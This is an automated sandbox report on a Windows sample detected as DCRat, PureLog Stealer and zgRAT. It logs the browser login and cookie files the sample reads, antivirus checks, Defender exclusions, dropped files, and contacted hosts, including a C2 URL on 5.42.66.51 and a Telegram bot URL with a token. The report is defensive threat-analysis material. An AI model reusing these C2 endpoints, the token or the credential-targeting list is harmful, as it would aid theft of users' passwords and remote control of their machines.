Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531798 Sample: d3ca1c9cdcf0f664f4c4b469ce9... Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 70 api.telegram.org 2->70 72 ipinfo.io 2->72 82 Suricata IDS alerts for network traffic 2->82 84 Antivirus detection for dropped file 2->84 86 Antivirus / Scanner detection for submitted sample 2->86 90 15 other signatures 2->90 8 d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe 18 35 2->8         started        13 JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe 2->13         started        15 WmiPrvSE.exe 2->15         started        17 5 other processes 2->17 signatures3 88 Uses the Telegram API (likely for C&C communication) 70->88 process4 dnsIp5 74 api.telegram.org 149.154.167.220, 443, 49706 TELEGRAMRU United Kingdom 8->74 76 ipinfo.io 34.117.59.81, 443, 49704, 49705 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->76 54 C:\Users\user\Downloads\smartscreen.exe, PE32 8->54 dropped 56 C:\Users\user\Desktop\yuQrGMvY.log, PE32 8->56 dropped 58 C:\Users\user\Desktop\ylgZbdUT.log, PE32 8->58 dropped 66 20 other malicious files 8->66 dropped 94 Adds a directory exclusion to Windows Defender 8->94 96 Creates processes via WMI 8->96 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        32 10 other processes 8->32 78 5.42.66.51, 49798, 49851, 49852 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 13->78 60 C:\Users\user\Desktop\ttRrlCpd.log, PE32 13->60 dropped 62 C:\Users\user\Desktop\rreJQTki.log, PE32 13->62 dropped 64 C:\Users\user\Desktop\qDaBeGpk.log, PE32 13->64 dropped 68 11 other malicious files 13->68 dropped 98 Multi AV Scanner detection for dropped file 13->98 100 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->100 102 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 13->102 104 Tries to harvest and steal browser information (history, passwords, etc) 13->104 26 powershell.exe 13->26         started        28 powershell.exe 13->28         started        30 powershell.exe 13->30         started        34 9 other processes 13->34 106 Antivirus detection for dropped file 15->106 108 Machine Learning detection for dropped file 15->108 80 127.0.0.1 unknown unknown 17->80 file6 signatures7 process8 signatures9 92 Loading BitLocker PowerShell Module 19->92 36 conhost.exe 19->36         started        38 conhost.exe 22->38         started        40 conhost.exe 24->40         started        42 conhost.exe 26->42         started        44 conhost.exe 28->44         started        46 conhost.exe 30->46         started        48 conhost.exe 32->48         started        50 12 other processes 32->50 52 9 other processes 34->52 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
5.42.66.51
 unknown Russian Federation
39493 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU true
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
ipinfo.io 34.117.59.81 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipinfo.io/country false
    		unknown
    http://5.42.66.51/8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php true
      		unknown
      https://api.telegram.org/bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto false
        		unknown
        https://ipinfo.io/ip false
          		unknown